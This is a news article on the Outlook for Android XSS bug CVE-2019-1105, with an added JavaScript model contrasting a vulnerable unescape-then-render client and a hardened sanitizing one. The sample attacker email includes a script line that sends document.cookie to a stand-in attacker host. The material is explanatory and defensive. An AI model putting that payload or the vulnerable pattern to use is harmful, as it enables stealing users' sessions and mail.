Remote Code Execution Bug in Microsoft Outlook for Android - PoC Released

If you use the Microsoft Outlook app on Android for your email, this one matters to you. Microsoft has recently patched a critical cross-site scripting bug in the Outlook Android app that lets attacker-controlled JavaScript run inside the app, which the researcher who found it describes as remote code execution.

The bug, tracked as CVE-2019-1105, was discovered by security researcher Bryan Appleby of F5 Networks, who reported it to Microsoft's security team in December 2018; Microsoft published the fix in June 2019. Note that Microsoft's advisory classifies CVE-2019-1105 as a spoofing vulnerability in Outlook for Android, while Bryan calls it remote code execution because attacker-supplied script ends up executing inside the app. In a blog post, Bryan disclosed the full technical details of the bug together with a proof of concept.

In the post, Bryan says he stumbled on the cross-site scripting (XSS) issue by accident: an attacker could embed an iframe in an email and have it rendered by the app. Digging further, he found that JavaScript executed inside the injected iframe runs in the context of the logged-in Outlook user, so it can read app content on that user's behalf, including their cookies, tokens and even some of the contents of their inbox.

"This kind of vulnerability could be exploited by an attacker sending an email with JavaScript in it. The server escapes that JavaScript and does not see it because it's within an iframe. When delivered, the mail client automatically undoes the escaping and the JavaScript runs on the client device. Bingo – remote code execution.

This code can do whatever the attacker desires, up to and including stealing information and/or sending data back out. An attacker can send you an email and just by you reading it, they could steal the contents of your inbox. Weaponized, this can turn into a very nasty piece of malware," he added.
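The escape-on-the-server, unescape-on-the-client pattern Bryan describes is easy to see in a small model. The code below is an added example written for this article; it is not Outlook's code and not Bryan's proof of concept, and every function name, the attacker domain and the sample email body are constructed for illustration. It shows why a filter that runs before escaping sees nothing, and the fix a client should apply instead: sanitize the markup after decoding, with an allow-list, rather than trusting the stored body.

```javascript
// Constructed model of the bug described in the quote above. Not Outlook's
// code; all names and the sample email are hypothetical.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const UNESCAPES = { amp: "&", lt: "<", gt: ">", quot: '"', "#39": "'" };

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Decodes exactly one level of escaping (a second pass is not applied).
function unescapeHtml(s) {
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (_, e) => UNESCAPES[e]);
}

// Server side (constructed): escape the body before storing it. After this,
// no `<` survives, so a server-side markup filter has nothing to reject.
function serverStoreBody(rawBody) {
  return escapeHtml(rawBody);
}

// Vulnerable client: decode the stored body and hand the result to the
// rendering WebView as-is. The iframe the server "removed" comes back.
function vulnerableClientRender(storedBody) {
  return unescapeHtml(storedBody);
}

// Hardened client: decode first, then sanitize the *decoded* markup with an
// allow-list. Minimal regex tokenizer for illustration only; production code
// should use a maintained HTML sanitizer rather than this.
const ALLOWED_TAGS = new Set(["p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"]);

function sanitizeDecodedHtml(html) {
  return html.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g, (tag, name) => {
    const lower = name.toLowerCase();
    if (!ALLOWED_TAGS.has(lower)) return ""; // drops iframe, script, object, embed, ...
    if (tag.startsWith("</")) return `</${lower}>`;
    if (lower === "a") {
      // Keep only http(s) links; javascript: URLs and on* handlers are dropped.
      const m = /\bhref\s*=\s*"([^"]*)"/i.exec(tag);
      const href = m && /^https?:\/\//i.test(m[1]) ? ` href="${m[1]}"` : "";
      return `<a${href} rel="noopener noreferrer">`;
    }
    return `<${lower}>`; // every attribute, including onload/onerror, is discarded
  });
}

function hardenedClientRender(storedBody) {
  return sanitizeDecodedHtml(unescapeHtml(storedBody));
}

// Constructed attacker email: an iframe whose srcdoc carries a script that
// exfiltrates document.cookie to a hypothetical attacker host.
const CONSTRUCTED_EMAIL =
  '<p>Invoice attached</p>' +
  '<iframe srcdoc="&lt;script&gt;fetch(\'https://attacker.example/?c=\'+document.cookie)&lt;/script&gt;"></iframe>';

// Round trip through both clients; returns what each would feed the WebView.
function demo(rawEmail = CONSTRUCTED_EMAIL) {
  const stored = serverStoreBody(rawEmail);
  return {
    stored,
    serverSeesMarkup: stored.includes("<"),
    vulnerable: vulnerableClientRender(stored),
    hardened: hardenedClientRender(stored),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The stored body contains no `<` at all, which is why a server-side check finds nothing to flag; the vulnerable client reproduces the original iframe byte for byte, while the hardened client keeps only the paragraph. The general lesson is that decoding must never be the last step before rendering untrusted HTML: whatever sanitization you rely on has to run on the exact string the WebView receives.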


As you can see, this is a serious issue, so we recommend that all users update the Outlook app from the Play Store immediately. To check that you are covered, open the app's Play Store page, install any pending update, and confirm that the installed version is at or above the one Microsoft lists as fixed in its advisory for CVE-2019-1105.
